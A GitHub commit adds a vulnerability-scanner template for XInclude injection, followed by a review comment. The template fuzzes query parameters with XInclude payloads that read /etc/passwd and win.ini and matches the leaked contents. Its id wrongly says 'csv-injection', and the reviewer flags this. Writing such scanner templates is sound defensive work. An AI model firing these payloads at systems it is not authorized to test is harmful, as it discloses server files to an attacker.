Create csv-injection.yaml

patch-4
Ritik Chaddha 2024-07-01 17:35:37 +05:30 committed by GitHub
parent 425160439c
commit f3f929a3c2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 44 additions and 0 deletions


@ -0,0 +1,44 @@
id: csv-injection
info:
name: XInclude Injection Detection
author: DhiyaneshDK,ritikchaddha
severity: high
description: |
XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
reference:
- https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks
tags: dast,xxe,xinclude
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
xinc_fuzz:
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></asd>'
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///c:/windows/win.ini"/></asd>'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{xinc_fuzz}}'
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: linux
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'
- type: word
name: windows
part: body
words:
- 'for 16-bit app support'
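Review bot: The template's first line, `id: csv-injection`, and the file name in the commit title do not match what the template tests: the `name`, the `tags` (`dast,xxe,xinclude`) and both `xinc_fuzz` payloads are for XInclude injection. Scan results are keyed by template id, so a hit here would be reported and triaged as CSV injection, and the id may later collide with a real CSV-injection template. I would change the line to `id: xinclude-injection` and rename the file to match. Separately, the `description` explains XInclude but not what a match means; a closing sentence such as `A match means a query parameter value was processed by an XInclude-aware XML parser and local file contents were returned in the response body.` would help whoever triages the finding.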